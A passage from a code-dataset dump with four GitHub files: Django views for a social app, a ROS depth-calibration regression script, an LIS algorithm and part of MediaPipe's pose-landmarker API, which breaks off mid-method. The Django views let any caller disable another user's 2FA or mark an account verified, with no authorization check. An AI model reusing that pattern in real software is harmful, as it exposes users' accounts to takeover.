pyotp.TOTP(user.otp_secret)\n if not totp.verify(otp_code):\n return redirect('login')\n request.session['userid'] = user.pk\n return redirect('mainpage')\n else:\n # TODO: display error message to users\n return redirect('login')\n\ndef logout_user(request):\n request.session['userid'] = None\n return redirect('login')\n\n##\n# TODO: proper error handling:\n# - User not logged in\n# - User ID invalid\n# - Post ID invalid\n#\n# TODO: implement for AJAX\n#\ndef report_post(request, pk):\n user = User.objects.get(pk=request.session['userid'])\n post = Post.objects.get(pk=pk)\n report = Report(reporter=user, post=post)\n report.save()\n return redirect('mainpage')\n\ndef block_user(request, pk):\n blockee = User.objects.get(pk=pk)\n blocker = User.objects.get(pk=request.session['userid'])\n blocker.blocking.add(blockee)\n blocker.save()\n # TODO: delete existing following relationship\n deleteFollow(pk, blocker.username)\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef unblock_user(request, pk):\n blockee = User.objects.get(pk=pk)\n blocker = User.objects.get(pk=request.session['userid'])\n blocker.blocking.remove(blockee)\n blocker.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef request_verification(request, pk):\n user = User.objects.get(pk=pk)\n if user.verified == 0:\n user.verified = 1\n user.save()\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\ndef enable_2fa(request, pk):\n user = User.objects.get(pk=pk)\n if not user.otp_secret:\n user.otp_secret = pyotp.random_base32()\n user.save()\n return redirect('mainpage')\n\ndef disable_2fa(request, pk):\n user = User.objects.get(pk=pk)\n if user.otp_secret:\n user.otp_secret = \"\"\n user.save()\n return redirect('mainpage')\n","repo_name":"karagenit/twistter","sub_path":"blogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74717873367","text":"#!/usr/bin/env python\nimport cv2\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg') # NOQA\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nfrom jsk_recognition_msgs.msg import DepthErrorResult\nfrom sklearn import linear_model\nimport time\nimport threading\nimport sys\nimport rospy\nimport argparse\nimport csv\nimport math\nimport datetime\nfrom jsk_recognition_msgs.srv import SetDepthCalibrationParameter\nfrom jsk_recognition_msgs.msg import DepthCalibrationParameter\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nxs = []\nraw_xs = []\nys = []\nus = []\nvs = []\nc_us = []\nc_vs = []\nvalue_cache = dict() # (u, v) -> [z]\neps_z = 0.1 # 10cm\nlock = threading.Lock()\nu_min = None\nu_max = None\nv_min = None\nv_max = None\nmodel = None\nset_param = None\nMODELS = [\"linear\", \"quadratic\", \"quadratic-uv\", \"quadratic-uv-abs\", \"quadratic-uv-quadratic\", \"quadratic-uv-quadratic-abs\"]\n\n# use raw_input for python2 c.f. https://stackoverflow.com/questions/5868506/backwards-compatible-input-calls-in-python\nif hasattr(__builtins__, 'raw_input'):\n input = raw_input\n\ndef query_yes_no(question, default=None):\n \"\"\"Ask a yes/no question via raw_input() and return their answer.\n\n \"question\" is a string that is presented to the user.\n \"default\" is the presumed answer if the user just hits .\n It must be \"yes\" (the default), \"no\" or None (meaning\n an answer is required of the user).\n\n The \"answer\" return value is one of \"yes\" or \"no\".\n \"\"\"\n valid = {\"yes\": True, \"y\": True, \"ye\": True,\n \"no\": False, \"n\": False}\n if default is None:\n prompt = \" [y/n] \"\n elif default == \"yes\":\n prompt = \" [Y/n] \"\n elif default == \"no\":\n prompt = \" [y/N] \"\n else:\n raise ValueError(\"invalid default answer: '%s'\" % default)\n\n while True:\n sys.stdout.write(question + prompt)\n choice = input().lower()\n if default is not None and choice == '':\n return valid[default]\n elif choice in valid:\n return valid[choice]\n else:\n sys.stdout.write(\"Please respond with 'yes' or 'no' \"\n \"(or 'y' or 'n').\\n\")\n\n\ndef getXFromFeatureVector(v):\n if model == \"linear\":\n return v[0]\n elif model == \"quadratic\":\n return v[1]\n elif model == \"quadratic-uv\" or model == \"quadratic-uv-abs\":\n return v[-3]\n elif model == \"quadratic-uv-quadratic\" or model == \"quadratic-uv-quadratic-abs\":\n return v[-5]\n\ndef genFeatureVector(x, u, v, cu, cv):\n global model\n x2 = x * x\n u2 = u * u\n v2 = v * v\n if model == \"linear\":\n return [x]\n elif model == \"quadratic\":\n return [x2, x]\n elif model == \"quadratic-uv\":\n return [u * x2, v * x2, x2,\n u * x, v * x, x,\n u, v]\n elif model == \"quadratic-uv-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n return [u * x2, v * x2, x2,\n u * x, v * x, x,\n u, v]\n elif model == \"quadratic-uv-quadratic\":\n return [u2 * x2, u * x2, v2 * x2, v * x2, x2, \n u2 * x, u * x, v2 * x, v * x, x, \n u2, u, v2, v]\n elif model == \"quadratic-uv-quadratic-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n u2 = u * u\n v2 = v * v\n return [u2 * x2, u * x2, v2 * x2, v * x2, x2, \n u2 * x, u * x, v2 * x, v * x, x, \n u2, u, v2, v]\n\ndef isValidClassifier(classifier):\n # before classifire outputs meaningful value,\n # intercept is a list, so we skip the value\n c0 = classifier.intercept_\n return not hasattr(c0, \"__len__\");\n \ndef setParameter(classifier):\n global set_param\n c = classifier.coef_\n c0 = classifier.intercept_\n param = DepthCalibrationParameter()\n if not isValidClassifier(classifier):\n print(\"parameters are list\")\n return\n if model == \"linear\":\n param.coefficients2 = [0, 0, 0, 0, 0]\n param.coefficients1 = [0, 0, 0, 0, c[0]]\n param.coefficients0 = [0, 0, 0, 0, c0]\n param.use_abs = False\n elif model == \"quadratic\":\n param.coefficients2 = [0, 0, 0, 0, c[0]]\n param.coefficients1 = [0, 0, 0, 0, c[1]]\n param.coefficients0 = [0, 0, 0, 0, c0]\n param.use_abs = False\n elif model == \"quadratic-uv\":\n param.coefficients2 = [0, c[0], 0, c[1], c[2]]\n param.coefficients1 = [0, c[3], 0, c[4], c[5]]\n param.coefficients0 = [0, c[6], 0, c[7], c0]\n param.use_abs = False\n elif model == \"quadratic-uv-abs\":\n param.coefficients2 = [0, c[0], 0, c[1], c[2]]\n param.coefficients1 = [0, c[3], 0, c[4], c[5]]\n param.coefficients0 = [0, c[6], 0, c[7], c0]\n param.use_abs = True\n elif model == \"quadratic-uv-quadratic\":\n param.coefficients2 = c[0:5]\n param.coefficients1 = c[5:10]\n param.coefficients0 = [c[10], c[11], c[12], c[13], c0]\n param.use_abs = False\n elif model == \"quadratic-uv-quadratic-abs\":\n param.coefficients2 = c[0:5]\n param.coefficients1 = c[5:10]\n param.coefficients0 = [c[10], c[11], c[12], c[13], c0]\n param.use_abs = True\n set_param(param)\n\ndef processData(x, y, u, v, cu, cv, fit = True):\n global xs, ys, classifier, u_min, u_max, v_min, v_max, raw_xs\n uu = int(u/10)\n vv = int(v/10)\n with lock:\n if (uu, vv) in value_cache:\n zs = value_cache[(uu, vv)]\n for z in zs:\n if abs(z - y) < eps_z:\n print(\"duplicated value\")\n return\n else:\n value_cache[(uu, vv)].append(y)\n else:\n value_cache[(uu, vv)] = [y]\n raw_xs.append(x)\n us.append(u)\n vs.append(v)\n c_us.append(cu)\n c_vs.append(cv)\n if u > u_min and u < u_max and v < v_max and v > v_min:\n print((x, y))\n xs.append(genFeatureVector(x, u, v, cu, cv))\n ys.append(y)\n if fit:\n classifier.fit(xs, ys)\n try:\n setParameter(classifier)\n except rospy.service.ServiceException as e:\n rospy.logfatal(\"failed to call service: %s\" % (e.message))\n try:\n print(modelEquationString(classifier))\n except Exception as e:\n rospy.logwarn(\"failed to print model: %s\" % e.message)\n \n else:\n print(\"(%d, %d) is out of range\" % (u, v))\n \ndef callback(msg):\n global xs, ys, classifier, u_min, u_max, v_min, v_max, raw_xs\n \n x = msg.observed_depth\n y = msg.true_depth\n u = msg.u\n v = msg.v\n if math.isnan(x) or math.isnan(y):\n return\n processData(x, y, u, v, msg.center_u, msg.center_v)\n updatePlot()\n\ndef uvCoefString(c, absolute=False):\n if absolute:\n return \"%f|u| + %f|v| + %f\" % (c[0], c[1], c[2])\n else:\n return \"%fu + %fv + %f\" % (c[0], c[1], c[2])\ndef uvQuadraticCoefString(c, absolute=False):\n if absolute:\n return \"%f|u|^2 + %f|u| + %f|v|^2 + %f|v| + %f\" % (c[0], c[1], c[2], c[3], c[4])\n else:\n return \"%fu^2 + %fu + %fv^2 + %fv + %f\" % (c[0], c[1], c[2], c[3], c[4])\n \ndef modelEquationString(classifier):\n global model, xs, ys\n c = classifier.coef_\n i = classifier.intercept_\n if model == \"linear\":\n return \"%fz + %f\\n(score: %f)\" % (\n c[0], i,\n classifier.score(xs, ys))\n elif model == \"quadratic\":\n return \"%fz^2 + %fz + %f\\n(score: %f)\" % (\n c[0],\n c[1],\n i,\n classifier.score(xs, ys))\n elif model == \"quadratic-uv\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvCoefString(c[0:3]),\n uvCoefString(c[3:6]),\n uvCoefString([c[6], c[7], i]),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-abs\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvCoefString(c[0:3], True),\n uvCoefString(c[3:6], True),\n uvCoefString([c[6], c[7], i], True),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-quadratic\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvQuadraticCoefString(c[0:5]),\n uvQuadraticCoefString(c[5:10]),\n uvQuadraticCoefString([c[10], c[11], c[12], c[13], i]),\n classifier.score(xs, ys))\n elif model == \"quadratic-uv-quadratic-abs\":\n return \"(%s)z^2 +\\n(%s)z +\\n%s\\n(score: %f)\" % (\n uvQuadraticCoefString(c[0:5], True),\n uvQuadraticCoefString(c[5:10], True),\n uvQuadraticCoefString([c[10], c[11], c[12], c[13], i], True),\n classifier.score(xs, ys))\n\ndef applyModel(x, u, v, cu, cv, clssifier):\n global model\n c = classifier.coef_\n i = classifier.intercept_\n if model == \"linear\":\n return c[0] * x + i\n elif model == \"quadratic\":\n return c[0] * x * x + c[1] * x + i\n elif model == \"quadratic-uv\":\n return ((c[0] * u + c[1] * v + c[2]) * x * x + \n (c[3] * u + c[4] * v + c[5]) * x + \n c[6] * u + c[7] * v + i)\n elif model == \"quadratic-uv-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n return ((c[0] * u + c[1] * v + c[2]) * x * x + \n (c[3] * u + c[4] * v + c[5]) * x + \n c[6] * u + c[7] * v + i)\n elif model == \"quadratic-uv-quadratic\":\n u2 = u * u\n v2 = v * v\n return ((c[0] * u2 + c[1] * u + c[2] * v2 + c[3] * v + c[4]) * x * x + \n (c[5] * u2 + c[6] * u + c[7] * v2 + c[8] * v + c[9]) * x + \n (c[10] * u2 + c[11] * u + c[12] * v2 + c[13] * v + i))\n elif model == \"quadratic-uv-quadratic-abs\":\n u = abs(u - cu)\n v = abs(v - cv)\n u2 = u * u\n v2 = v * v\n return ((c[0] * u2 + c[1] * u + c[2] * v2 + c[3] * v + c[4]) * x * x + \n (c[5] * u2 + c[6] * u + c[7] * v2 + c[8] * v + c[9]) * x + \n (c[10] * u2 + c[11] * u + c[12] * v2 + c[13] * v + i))\n \n \ndef updatePlot():\n global xs, ax, width, height\n if rospy.is_shutdown():\n plt.close()\n return\n with lock:\n if len(xs) == 0:\n return\n try:\n plt.cla()\n plt.xlabel('Z from depth image')\n plt.ylabel('Z from checker board')\n plt.grid(True)\n plt.title(model)\n plt.scatter([getXFromFeatureVector(x) for x in xs[:-1]],\n ys[:-1], s=10, c='b', zorder=10, alpha=0.1)\n plt.scatter([getXFromFeatureVector(xs[-1])],\n [ys[-1]], s=10, c='r', zorder=10, alpha=1.0)\n xmin = np.amin([getXFromFeatureVector(x) for x in xs])\n xmax = np.amax([getXFromFeatureVector(x) for x in xs])\n X_test = [[xmin * xmin, xmin], [xmax * xmax, xmax]]\n X_range = np.linspace(xmin, xmax, 100)\n ax.plot(X_range, X_range, linewidth=2, color='green', alpha=0.5)\n ax.plot(X_range, \n applyModel(X_range, \n width / 2, height / 2,\n width / 2, height / 2,\n classifier),\n linewidth=2, color='red', alpha=0.5)\n plt.text(xmin, xmax - 0.1,\n modelEquationString(classifier),\n fontsize=12)\n # publish frequency image\n bridge = CvBridge()\n img = generateFrequencyMap()\n pub_image.publish(bridge.cv2_to_imgmsg(img, \"bgr8\"))\n # publish error plot\n fig = plt.gcf()\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n plot_img = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8)\n fig.clf()\n plot_img.shape = (h, w, 3)\n plt.close()\n pub_error_plot.publish(bridge.cv2_to_imgmsg(plot_img, \"bgr8\"))\n except Exception as e:\n rospy.logerr(e.message)\n\ndef generateFrequencyMap():\n global width, height\n # bgr\n img = np.tile(np.uint8([0,0,0]), (height // 10, width // 10, 1))\n frequency = dict()\n for (u, v) in value_cache.keys():\n min_color = np.uint8([255, 0, 0])\n max_color = np.uint8([0, 0, 255])\n uu = u\n vv = v\n if (uu, vv) in frequency:\n frequency[(uu, vv)] = frequency[(uu, vv)] + len(value_cache[(u, v)])\n else:\n frequency[(uu, vv)] = len(value_cache[(u, v)])\n for (u, v) in frequency.keys():\n r = min(frequency[(u, v)] / 10.0, 1)\n img[v, u] = min_color * (1 - r) + max_color * r\n return img\n \ndef main():\n global ax, xs, ys, classifier, u_min, u_max, v_min, v_max, model, set_param\n global width, height, pub_image, pub_error_plot\n pub_image = rospy.Publisher(\"~frequency_image\", Image, queue_size=1)\n pub_error_plot = rospy.Publisher(\"~error_plot_image\", Image, queue_size=1)\n set_param = rospy.ServiceProxy(\"/camera_remote/depth_calibration/set_calibration_parameter\", \n SetDepthCalibrationParameter)\n # parse argument\n parser = argparse.ArgumentParser()\n parser.add_argument('--csv')\n parser.add_argument('--model', default=\"linear\")\n parser.add_argument('--models', action=\"store_true\", default=False)\n parser.add_argument(\"--width\", default=640)\n parser.add_argument(\"--height\", default=480)\n args = parser.parse_args(rospy.myargv()[1:])\n width = args.width\n height = args.height\n if args.models:\n for m in MODELS:\n print(m)\n return\n model = args.model\n if model not in MODELS:\n raise Exception(\"Unknown Model: %s\" % (model))\n \n if not args.csv:\n sub = rospy.Subscriber(\"depth_image_error/output\", \n DepthErrorResult, callback)\n #plt.ion()\n fig = plt.figure()\n ax = plt.axes([.12, .12, .8, .8])\n classifier = linear_model.LinearRegression()\n u_min = rospy.get_param(\"~u_min\", 0)\n u_max = rospy.get_param(\"~u_max\", 4096)\n v_min = rospy.get_param(\"~v_min\", 0)\n v_max = rospy.get_param(\"~v_max\", 4096)\n \n if args.csv:\n for row in csv.reader(open(args.csv, \"rb\")):\n x = float(row[0])\n y = float(row[1])\n u = float(row[2])\n v = float(row[3])\n cu = float(row[4])\n cv = float(row[5])\n processData(x, y, u, v, cu, cv, fit = False)\n classifier.fit(xs, ys)\n try:\n setParameter(classifier)\n except rospy.service.ServiceException as e:\n rospy.logfatal(\"failed to call service: %s\" % (e.message))\n try:\n plt.show()\n finally:\n if not args.csv:\n csv_filename = \"calibration-%s.csv\" % datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n print(\"Save calibration parameters to %s\" % (csv_filename))\n with open(csv_filename, \"w\") as f:\n for x, y, u, v, cu, cv in zip(raw_xs, ys, us, vs, c_us, c_vs):\n f.write(\"%f,%f,%d,%d,%f,%f\\n\" % (x, y, u, v, cu, cv))\n dump = rospy.get_param(\"~dump_result_into_yaml\", \"query\")\n if dump is True or \\\n (dump == \"query\" and query_yes_no(\"Dump result into yaml file?\")):\n yaml_filename = \"calibration_parameter_%s.yaml\" % datetime.datetime.now().strftime('%Y_%m_%d_%H_%M_%S')\n print(\"writing to %s\" % yaml_filename)\n c = classifier.coef_\n if model == \"quadratic-uv-abs\" or model == \"quadratic-uv-quadratic-abs\":\n use_abs = \"True\"\n else:\n use_abs = \"False\"\n \n with open(yaml_filename, \"w\") as f:\n f.write(\"\"\"\ncoefficients2: [%s, %s, %s, %s, %s]\ncoefficients1: [%s, %s, %s, %s, %s]\ncoefficients0: [%s, %s, %s, %s, %s]\nuse_abs: %s\n \"\"\" % (\n repr(c[0]), repr(c[1]), repr(c[2]), repr(c[3]), repr(c[4]), \n repr(c[5]), repr(c[6]), repr(c[7]), repr(c[8]), repr(c[9]),\n repr(c[10]), repr(c[11]), repr(c[12]), repr(c[13]), repr(classifier.intercept_),\n use_abs))\n\nif __name__ == \"__main__\":\n rospy.init_node(\"depth_error_logistic_regression\")\n main()\n rospy.spin()\n","repo_name":"jsk-ros-pkg/jsk_recognition","sub_path":"jsk_pcl_ros/scripts/check_depth_error/depth_error_calibration.py","file_name":"depth_error_calibration.py","file_ext":"py","file_size_in_byte":16504,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"31"} +{"seq_id":"14045682258","text":"\"\"\"\n Geeksforgeeks Practice\n https://practice.geeksforgeeks.org/problems/longest-increasing-subsequence/0\n\"\"\"\n\n\nclass Solution:\n @staticmethod\n def get_lis(n, arr):\n lis = [1 for i in range(n)]\n\n for j in range(1, n):\n for i in range(0, j):\n if arr[i] < arr[j]:\n lis[j] = max(lis[j], lis[i] + 1)\n\n return lis[-1]\n\nif __name__ == \"__main__\":\n t = int(input())\n\n while t > 0:\n t-=1\n\n n = int(input())\n\n arr = list(map(int, input().strip().split(' ')))\n\n print(Solution.get_lis(n, arr))\n","repo_name":"manasacharyya25/DSA","sub_path":"Dynamic Programming/09. Longest Increasing Subsequence.py","file_name":"09. Longest Increasing Subsequence.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74325977369","text":"import dataclasses\nfrom typing import Callable, Mapping, Optional, List\n\nfrom mediapipe.framework.formats import landmark_pb2\nfrom mediapipe.python import packet_creator\nfrom mediapipe.python import packet_getter\nfrom mediapipe.python._framework_bindings import image as image_module\nfrom mediapipe.python._framework_bindings import packet as packet_module\nfrom mediapipe.tasks.cc.vision.pose_landmarker.proto import pose_landmarker_graph_options_pb2\nfrom mediapipe.tasks.python.components.containers import landmark as landmark_module\nfrom mediapipe.tasks.python.core import base_options as base_options_module\nfrom mediapipe.tasks.python.core import task_info as task_info_module\nfrom mediapipe.tasks.python.core.optional_dependencies import doc_controls\nfrom mediapipe.tasks.python.vision.core import base_vision_task_api\nfrom mediapipe.tasks.python.vision.core import image_processing_options as image_processing_options_module\nfrom mediapipe.tasks.python.vision.core import vision_task_running_mode as running_mode_module\n\n_BaseOptions = base_options_module.BaseOptions\n_PoseLandmarkerGraphOptionsProto = (\n pose_landmarker_graph_options_pb2.PoseLandmarkerGraphOptions\n)\n_RunningMode = running_mode_module.VisionTaskRunningMode\n_ImageProcessingOptions = image_processing_options_module.ImageProcessingOptions\n_TaskInfo = task_info_module.TaskInfo\n\n_IMAGE_IN_STREAM_NAME = 'image_in'\n_IMAGE_OUT_STREAM_NAME = 'image_out'\n_IMAGE_TAG = 'IMAGE'\n_NORM_RECT_STREAM_NAME = 'norm_rect_in'\n_NORM_RECT_TAG = 'NORM_RECT'\n_SEGMENTATION_MASK_STREAM_NAME = 'segmentation_mask'\n_SEGMENTATION_MASK_TAG = 'SEGMENTATION_MASK'\n_NORM_LANDMARKS_STREAM_NAME = 'norm_landmarks'\n_NORM_LANDMARKS_TAG = 'NORM_LANDMARKS'\n_POSE_WORLD_LANDMARKS_STREAM_NAME = 'world_landmarks'\n_POSE_WORLD_LANDMARKS_TAG = 'WORLD_LANDMARKS'\n_TASK_GRAPH_NAME = 'mediapipe.tasks.vision.pose_landmarker.PoseLandmarkerGraph'\n_MICRO_SECONDS_PER_MILLISECOND = 1000\n\n\n@dataclasses.dataclass\nclass PoseLandmarkerResult:\n \"\"\"The pose landmarks detection result from PoseLandmarker, where each vector element represents a single pose detected in the image.\n\n Attributes:\n pose_landmarks: Detected pose landmarks in normalized image coordinates.\n pose_world_landmarks: Detected pose landmarks in world coordinates.\n segmentation_masks: Optional segmentation masks for pose.\n \"\"\"\n\n pose_landmarks: List[List[landmark_module.NormalizedLandmark]]\n pose_world_landmarks: List[List[landmark_module.Landmark]]\n segmentation_masks: Optional[List[image_module.Image]] = None\n\n\ndef _build_landmarker_result(\n output_packets: Mapping[str, packet_module.Packet]\n) -> PoseLandmarkerResult:\n \"\"\"Constructs a `PoseLandmarkerResult` from output packets.\"\"\"\n pose_landmarker_result = PoseLandmarkerResult([], [])\n\n if _SEGMENTATION_MASK_STREAM_NAME in output_packets:\n pose_landmarker_result.segmentation_masks = packet_getter.get_image_list(\n output_packets[_SEGMENTATION_MASK_STREAM_NAME]\n )\n\n pose_landmarks_proto_list = packet_getter.get_proto_list(\n output_packets[_NORM_LANDMARKS_STREAM_NAME]\n )\n pose_world_landmarks_proto_list = packet_getter.get_proto_list(\n output_packets[_POSE_WORLD_LANDMARKS_STREAM_NAME]\n )\n\n for proto in pose_landmarks_proto_list:\n pose_landmarks = landmark_pb2.NormalizedLandmarkList()\n pose_landmarks.MergeFrom(proto)\n pose_landmarks_list = []\n for pose_landmark in pose_landmarks.landmark:\n pose_landmarks_list.append(\n landmark_module.NormalizedLandmark.create_from_pb2(pose_landmark)\n )\n pose_landmarker_result.pose_landmarks.append(pose_landmarks_list)\n\n for proto in pose_world_landmarks_proto_list:\n pose_world_landmarks = landmark_pb2.LandmarkList()\n pose_world_landmarks.MergeFrom(proto)\n pose_world_landmarks_list = []\n for pose_world_landmark in pose_world_landmarks.landmark:\n pose_world_landmarks_list.append(\n landmark_module.Landmark.create_from_pb2(pose_world_landmark)\n )\n pose_landmarker_result.pose_world_landmarks.append(\n pose_world_landmarks_list\n )\n\n return pose_landmarker_result\n\n\nclass PoseLandmarksConnections:\n \"\"\"The connections between pose landmarks.\"\"\"\n\n @dataclasses.dataclass\n class Connection:\n \"\"\"The connection class for pose landmarks.\"\"\"\n\n start: int\n end: int\n\n POSE_LANDMARKS: List[Connection] = [\n Connection(0, 1),\n Connection(1, 2),\n Connection(2, 3),\n Connection(3, 7),\n Connection(0, 4),\n Connection(4, 5),\n Connection(5, 6),\n Connection(6, 8),\n Connection(9, 10),\n Connection(11, 12),\n Connection(11, 13),\n Connection(13, 15),\n Connection(15, 17),\n Connection(15, 19),\n Connection(15, 21),\n Connection(17, 19),\n Connection(12, 14),\n Connection(14, 16),\n Connection(16, 18),\n Connection(16, 20),\n Connection(16, 22),\n Connection(18, 20),\n Connection(11, 23),\n Connection(12, 24),\n Connection(23, 24),\n Connection(23, 25),\n Connection(24, 26),\n Connection(25, 27),\n Connection(26, 28),\n Connection(27, 29),\n Connection(28, 30),\n Connection(29, 31),\n Connection(30, 32),\n Connection(27, 31),\n Connection(28, 32)\n ]\n\n\n@dataclasses.dataclass\nclass PoseLandmarkerOptions:\n \"\"\"Options for the pose landmarker task.\n\n Attributes:\n base_options: Base options for the pose landmarker task.\n running_mode: The running mode of the task. Default to the image mode.\n PoseLandmarker has three running modes: 1) The image mode for detecting\n pose landmarks on single image inputs. 2) The video mode for detecting\n pose landmarks on the decoded frames of a video. 3) The live stream mode\n for detecting pose landmarks on the live stream of input data, such as\n from camera. In this mode, the \"result_callback\" below must be specified\n to receive the detection results asynchronously.\n num_poses: The maximum number of poses can be detected by the\n PoseLandmarker.\n min_pose_detection_confidence: The minimum confidence score for the pose\n detection to be considered successful.\n min_pose_presence_confidence: The minimum confidence score of pose presence\n score in the pose landmark detection.\n min_tracking_confidence: The minimum confidence score for the pose tracking\n to be considered successful.\n output_segmentation_masks: whether to output segmentation masks.\n result_callback: The user-defined result callback for processing live stream\n data. The result callback should only be specified when the running mode\n is set to the live stream mode.\n \"\"\"\n\n base_options: _BaseOptions\n running_mode: _RunningMode = _RunningMode.IMAGE\n num_poses: int = 1\n min_pose_detection_confidence: float = 0.5\n min_pose_presence_confidence: float = 0.5\n min_tracking_confidence: float = 0.5\n output_segmentation_masks: bool = False\n result_callback: Optional[\n Callable[[PoseLandmarkerResult, image_module.Image, int], None]\n ] = None\n\n @doc_controls.do_not_generate_docs\n def to_pb2(self) -> _PoseLandmarkerGraphOptionsProto:\n \"\"\"Generates an PoseLandmarkerGraphOptions protobuf object.\"\"\"\n base_options_proto = self.base_options.to_pb2()\n base_options_proto.use_stream_mode = (\n False if self.running_mode == _RunningMode.IMAGE else True\n )\n\n # Initialize the pose landmarker options from base options.\n pose_landmarker_options_proto = _PoseLandmarkerGraphOptionsProto(\n base_options=base_options_proto\n )\n pose_landmarker_options_proto.min_tracking_confidence = (\n self.min_tracking_confidence\n )\n pose_landmarker_options_proto.pose_detector_graph_options.num_poses = (\n self.num_poses\n )\n pose_landmarker_options_proto.pose_detector_graph_options.min_detection_confidence = (\n self.min_pose_detection_confidence\n )\n pose_landmarker_options_proto.pose_landmarks_detector_graph_options.min_detection_confidence = (\n self.min_pose_presence_confidence\n )\n return pose_landmarker_options_proto\n\n\nclass PoseLandmarker(base_vision_task_api.BaseVisionTaskApi):\n \"\"\"Class that performs pose landmarks detection on images.\"\"\"\n\n @classmethod\n def create_from_model_path(cls, model_path: str) -> 'PoseLandmarker':\n \"\"\"Creates a `PoseLandmarker` object from a model bundle file and the default `PoseLandmarkerOptions`.\n\n Note that the created `PoseLandmarker` instance is in image mode, for\n detecting pose landmarks on single image inputs.\n\n Args:\n model_path: Path to the model.\n\n Returns:\n `PoseLandmarker` object that's created from the model file and the\n default `PoseLandmarkerOptions`.\n\n Raises:\n ValueError: If failed to create `PoseLandmarker` object from the\n provided file such as invalid file path.\n RuntimeError: If other types of error occurred.\n \"\"\"\n base_options = _BaseOptions(model_asset_path=model_path)\n options = PoseLandmarkerOptions(\n base_options=base_options, running_mode=_RunningMode.IMAGE\n )\n return cls.create_from_options(options)\n\n @classmethod\n def create_from_options(\n cls, options: PoseLandmarkerOptions\n ) -> 'PoseLandmarker':\n \"\"\"Creates the `PoseLandmarker` object from pose landmarker options.\n\n Args:\n options: Options for the pose landmarker task.\n\n Returns:\n `PoseLandmarker` object that's created from `options`.\n\n Raises:\n ValueError: If failed to create `PoseLandmarker` object from\n `PoseLandmarkerOptions` such as missing the model.\n RuntimeError: If other types of error occurred.\n \"\"\"\n\n def packets_callback(output_packets: Mapping[str, packet_module.Packet]):\n if output_packets[_IMAGE_OUT_STREAM_NAME].is_empty():\n return\n\n image = packet_getter.get_image(output_packets[_IMAGE_OUT_STREAM_NAME])\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n empty_packet = output_packets[_NORM_LANDMARKS_STREAM_NAME]\n options.result_callback(\n PoseLandmarkerResult([], []),\n image,\n empty_packet.timestamp.value // _MICRO_SECONDS_PER_MILLISECOND,\n )\n return\n\n pose_landmarker_result = _build_landmarker_result(output_packets)\n timestamp = output_packets[_NORM_LANDMARKS_STREAM_NAME].timestamp\n options.result_callback(\n pose_landmarker_result,\n image,\n timestamp.value // _MICRO_SECONDS_PER_MILLISECOND,\n )\n\n output_streams = [\n ':'.join([_NORM_LANDMARKS_TAG, _NORM_LANDMARKS_STREAM_NAME]),\n ':'.join(\n [_POSE_WORLD_LANDMARKS_TAG, _POSE_WORLD_LANDMARKS_STREAM_NAME]\n ),\n ':'.join([_IMAGE_TAG, _IMAGE_OUT_STREAM_NAME]),\n ]\n\n if options.output_segmentation_masks:\n output_streams.append(\n ':'.join([_SEGMENTATION_MASK_TAG, _SEGMENTATION_MASK_STREAM_NAME])\n )\n\n task_info = _TaskInfo(\n task_graph=_TASK_GRAPH_NAME,\n input_streams=[\n ':'.join([_IMAGE_TAG, _IMAGE_IN_STREAM_NAME]),\n ':'.join([_NORM_RECT_TAG, _NORM_RECT_STREAM_NAME]),\n ],\n output_streams=output_streams,\n task_options=options,\n )\n return cls(\n task_info.generate_graph_config(\n enable_flow_limiting=options.running_mode\n == _RunningMode.LIVE_STREAM\n ),\n options.running_mode,\n packets_callback if options.result_callback else None,\n )\n\n def detect(\n self,\n image: image_module.Image,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> PoseLandmarkerResult:\n \"\"\"Performs pose landmarks detection on the given image.\n\n Only use this method when the PoseLandmarker is created with the image\n running mode.\n\n Args:\n image: MediaPipe Image.\n image_processing_options: Options for image processing.\n\n Returns:\n The pose landmarker detection results.\n\n Raises:\n ValueError: If any of the input arguments is invalid.\n RuntimeError: If pose landmarker detection failed to run.\n \"\"\"\n normalized_rect = self.convert_to_normalized_rect(\n image_processing_options, image, roi_allowed=False\n )\n output_packets = self._process_image_data({\n _IMAGE_IN_STREAM_NAME: packet_creator.create_image(image),\n _NORM_RECT_STREAM_NAME: packet_creator.create_proto(\n normalized_rect.to_pb2()\n ),\n })\n\n if output_packets[_NORM_LANDMARKS_STREAM_NAME].is_empty():\n return PoseLandmarkerResult([], [])\n\n return _build_landmarker_result(output_packets)\n\n def detect_for_video(\n self,\n image: image_module.Image,\n timestamp_ms: int,\n image_processing_options: Optional[_ImageProcessingOptions] = None,\n ) -> PoseLandmarkerResult:\n \"\"\"Performs pose landmarks detection on the provided video frame.\n\n Only use this method when the PoseLandmarker is created with the video\n running mode.\n\n Only use this method when the PoseLandmarker is created with the video\n running mode. It's required to provide the video frame's timestamp (in\n milliseconds) along with the video frame. The input timestamps should be\n monotonically increasing for adjacent calls of this method.\n\n Args:\n image: MediaPipe Image.\n timestamp_ms: The timestamp of the input video frame in milliseconds.\n image_processing_options: Options for image processing.\n\n Returns:\n The pose landmarker detection results.\n\n Raises:\n ValueError: If any of the input arguments is invalid.\n RuntimeError: If pose landmarker detection failed to run.\n \"\"\"\n 